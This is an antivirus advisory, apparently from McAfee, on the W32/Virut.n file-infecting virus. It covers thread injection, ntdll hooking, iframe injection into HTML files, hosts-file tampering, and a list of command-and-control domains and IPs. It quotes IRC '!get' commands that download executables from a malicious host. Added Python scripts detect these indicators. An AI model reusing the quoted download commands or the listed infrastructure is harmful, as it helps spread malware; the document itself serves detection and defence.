W32/Virut.n

Type: Virus
SubType: Generic
Discovery Date: 02/03/2009
Length: Varies
Minimum DAT: 5517 (02/05/2009)
Updated DAT: 5709 (08/14/2009)
Minimum Engine: 5.2.00
Description Added: 02/05/2009
Description Modified: 02/25/2009 8:25 PM (PT)

Risk Assessment
Corporate User: Low-Profiled
Home User: Low-Profiled

Characteristics

-- Update February 15, 2009 --
The risk assessment of this threat has been updated to Low-Profiled due to media attention at:
http://www.microsoft.com/security/portal/Entry.aspx?Name=Virus%3aWin32%2fVirut.BM

--

W32/Virut.n will first inject threads into the Winlogon.exe process. When successful, it will cause the process to download and run the following file:

  • %WINDOWS%\TEMP\VRT7.tmp

This file launches a new svchost.exe process and injects threads into it. The svchost process then creates the following files in the %WINDOWS%\System32 folder and deletes the earlier VRT7.tmp file:

  • 8.tmp (data file)
  • 9.tmp

(svchost.exe is itself a legitimate Windows process; only the injected threads are malicious.)

The 9.tmp file is then executed and can download further malware. The %WINDOWS%\System32\drivers\etc\hosts file is modified to have the following entry prepended:

  • 127.0.0.1 ZieF.pl

W32/Virut.n also injects code into running processes and hooks the following functions in ntdll.dll, which transfers control to the virus every time any of these functions is called:

  • NtCreateFile
  • NtCreateProcess
  • NtCreateProcessEx
  • NtOpenFile
  • NtQueryInformationProcess

This hooking is currently detected as Generic.dx!rootkit.

Besides executables, W32/Virut.n also infects HTML files. HTML files on the system are injected with an iframe pointing to a malicious domain such as ZieF.pl. Together with the modification of the HOSTS file, this allows W32/Virut.n to infect clean machines that access the infected HTML pages, while preventing an already-infected machine from connecting and being reinfected. This is possibly done to prevent the Virut server from being overloaded by infected machines.
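As an added example, not code from the advisory or from McAfee: a Python check for two of the host-side indicators described above, the loopback entry for ZieF.pl in the hosts file and iframes injected into HTML files that point at that domain. The sample hosts-file and HTML contents are constructed for the example, and the iframe path is a placeholder because the advisory names only the domain.

```python
import os
import re
from urllib.parse import urlparse

# Indicators taken from the advisory: the hosts-file entry that is prepended
# and the domain the injected iframes point at.
HOSTS_REDIRECT_IP = "127.0.0.1"
BAD_IFRAME_DOMAINS = {"zief.pl"}

# Matches an <iframe ...> tag and captures its src attribute (quoted or bare).
IFRAME_SRC_RE = re.compile(
    r"<iframe\b[^>]*\bsrc\s*=\s*['\"]?([^'\" >]+)", re.IGNORECASE)


def hosts_file_hijacked(hosts_text):
    """True if any line maps one of the bad domains to loopback.

    The advisory says the entry is prepended, but every line is checked so a
    copy that has been moved or re-sorted is still found."""
    for raw in hosts_text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and padding
        if not line:
            continue
        fields = line.split()
        if fields[0] == HOSTS_REDIRECT_IP and any(
                f.lower() in BAD_IFRAME_DOMAINS for f in fields[1:]):
            return True
    return False


def _host_of(src):
    # Tolerate scheme-less src values such as "zief.pl/x".
    if "://" not in src:
        src = "http://" + src
    return (urlparse(src).hostname or "").lower()


def injected_iframes(html_text):
    """Return the src of every iframe whose host is (or is under) a bad domain."""
    hits = []
    for src in IFRAME_SRC_RE.findall(html_text):
        host = _host_of(src)
        if host in BAD_IFRAME_DOMAINS or any(
                host.endswith("." + d) for d in BAD_IFRAME_DOMAINS):
            hits.append(src)
    return hits


def scan_html_tree(root):
    """Walk a directory and return {path: [bad iframe src, ...]} for infected files."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".htm", ".html")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    hits = injected_iframes(fh.read())
            except OSError:
                continue
            if hits:
                findings[path] = hits
    return findings


# Constructed samples (not captured from a real machine). The iframe path is
# a placeholder; the advisory gives only the domain.
SAMPLE_HOSTS_INFECTED = "127.0.0.1 ZieF.pl\n# standard header\n127.0.0.1 localhost\n"
SAMPLE_HOSTS_CLEAN = "# standard header\n127.0.0.1 localhost\n"
SAMPLE_HTML_INFECTED = (
    "<html><body><p>hello</p>"
    '<iframe src="http://ZieF.pl/" width="0" height="0"></iframe>'
    "</body></html>")
SAMPLE_HTML_CLEAN = '<html><body><iframe src="https://example.com/"></iframe></body></html>'

if __name__ == "__main__":
    import tempfile
    print("hosts hijacked:", hosts_file_hijacked(SAMPLE_HOSTS_INFECTED))
    print("bad iframes:", injected_iframes(SAMPLE_HTML_INFECTED))
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "index.html"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_HTML_INFECTED)
        print("tree findings:", scan_html_tree(tmp))
```

On a live system the hosts check would read %WINDOWS%\System32\drivers\etc\hosts and `scan_html_tree` would be pointed at the web roots and user profiles; a hit on either indicator is worth a full scan with current DATs, since the iframe and hosts changes are side effects of the PE infection rather than the infection itself.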

The following registry entry is modified to allow firewall access for Winlogon.exe:

  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List

The following registry entry is added:

  • HKEY_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UpdateHost

W32/Virut.n connects to the following domains or IP addresses:

  • horobl.cn
  • goasi.cn
  • setdoc.cn
  • irc.zief.pl
  • DNS2.zief.pl
  • proxim.ircgalaxy.pl
  • anti-captcha.com
  • lorentil.cn
  • thaexp.cn

  • 209.205.196.18
  • 66.232.126.195
  • 204.13.249.70
  • 58.65.232.34
  • 61.235.117.80
  • 61.235.117.81
  • 74.55.100.7
  • 124.207.41.201
  • 124.207.117.60
  • 124.236.241.91
  • 66.114.124.140
  • 64.13.232.135
  • 66.116.109.93
  • 210.51.37.106
  • 83.68.16.6
  • 211.95.79.6
  • 218.93.202.114
  • 69.46.16.191
  • 195.2.252.246
  • 94.247.2.38

It connects to the following IRC servers to receive commands:

  • irc.zief.pl
  • proxim.ircgalaxy.pl

It also joins an IRC channel to receive commands, which include downloading other malware:

  • PRIVMSG [blocked] :!get http://horobl.cn/[blocked]/0032.exe
  • PRIVMSG [blocked] :!get http://horobl.cn/[blocked]/0034.exe

Email addresses are harvested from the infected machine and posted to the following server:

  • 69.46.16.191

Malware that is downloaded may introduce other malicious behaviour on the system, such as rootkits, backdoors and further downloaders.

(where %WINDOWS% refers to the Windows folder, e.g. C:\Windows)
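As an added example (not from the advisory or from McAfee), a Python triage helper that matches log lines against the domains and IP addresses listed above and parses the IRC "!get" download command quoted above to extract the URL. The log lines are constructed for the example; the non-indicator addresses in them use private and documentation ranges, and the `[blocked]` placeholders are kept exactly as the advisory prints them rather than filled in.

```python
import re
from urllib.parse import urlparse

# Domains and IP addresses listed in the advisory as Virut.n infrastructure.
VIRUT_DOMAINS = {
    "horobl.cn", "goasi.cn", "setdoc.cn", "irc.zief.pl", "dns2.zief.pl",
    "proxim.ircgalaxy.pl", "anti-captcha.com", "lorentil.cn", "thaexp.cn",
}
VIRUT_IPS = {
    "209.205.196.18", "66.232.126.195", "204.13.249.70", "58.65.232.34",
    "61.235.117.80", "61.235.117.81", "74.55.100.7", "124.207.41.201",
    "124.207.117.60", "124.236.241.91", "66.114.124.140", "64.13.232.135",
    "66.116.109.93", "210.51.37.106", "83.68.16.6", "211.95.79.6",
    "218.93.202.114", "69.46.16.191", "195.2.252.246", "94.247.2.38",
}

# The IRC download command shape quoted in the advisory:
#   PRIVMSG <target> :!get <url>
GET_CMD_RE = re.compile(r"PRIVMSG\s+(\S+)\s+:!get\s+(\S+)", re.IGNORECASE)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HOSTNAME_RE = re.compile(r"\b[a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,}\b",
                         re.IGNORECASE)


def parse_get_command(line):
    """Extract target and URL from an IRC '!get' line, or None if absent."""
    m = GET_CMD_RE.search(line)
    if not m:
        return None
    target, url = m.groups()
    return {"target": target, "url": url,
            "host": (urlparse(url).hostname or "").lower()}


def indicators_in(line):
    """Return the set of advisory IPs/domains that appear in one log line."""
    found = set()
    for ip in IPV4_RE.findall(line):
        if ip in VIRUT_IPS:
            found.add(ip)
    for host in HOSTNAME_RE.findall(line):
        if host.lower() in VIRUT_DOMAINS:
            found.add(host.lower())
    return found


def triage(lines):
    """One record per line that matches an indicator or carries a !get command."""
    records = []
    for n, line in enumerate(lines, 1):
        hits = indicators_in(line)
        cmd = parse_get_command(line)
        if cmd and cmd["host"] in VIRUT_DOMAINS:
            hits.add(cmd["host"])
        if hits or cmd:
            records.append({"line": n, "indicators": sorted(hits),
                            "download": cmd["url"] if cmd else None})
    return records


# Constructed log lines (not a real capture). 10.0.0.5 and 192.0.2.10 are
# private/documentation addresses standing in for a monitored host and a
# benign peer; the [blocked] tokens are reproduced from the advisory as-is.
SAMPLE_LOG = [
    "2009-02-05 10:00:01 dns query A irc.zief.pl from 10.0.0.5",
    "2009-02-05 10:00:02 tcp 10.0.0.5:1042 -> 69.46.16.191:80",
    "2009-02-05 10:00:03 irc PRIVMSG [blocked] :!get http://horobl.cn/[blocked]/0032.exe",
    "2009-02-05 10:00:04 tcp 10.0.0.5:1043 -> 192.0.2.10:443",
]

if __name__ == "__main__":
    for rec in triage(SAMPLE_LOG):
        print(rec)
```

The hostname match is exact rather than suffix-based on purpose: the advisory lists specific hosts under zief.pl and ircgalaxy.pl, and widening to the parent domain is a policy decision for the analyst, not something the indicator list itself supports. The `!get` URL is surfaced separately so the downloaded sample can be pulled into the block list even when its host is not yet on it.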

Symptoms

Method of Infection

Removal

AVERT recommends always using the latest DATs and engine. This threat will be cleaned if you have this combination.

Additional Windows ME/XP removal considerations

Variants

N/A

Overview

W32/Virut.n is a polymorphic parasitic virus. It infects PE and HTML files on the system and downloads other malware.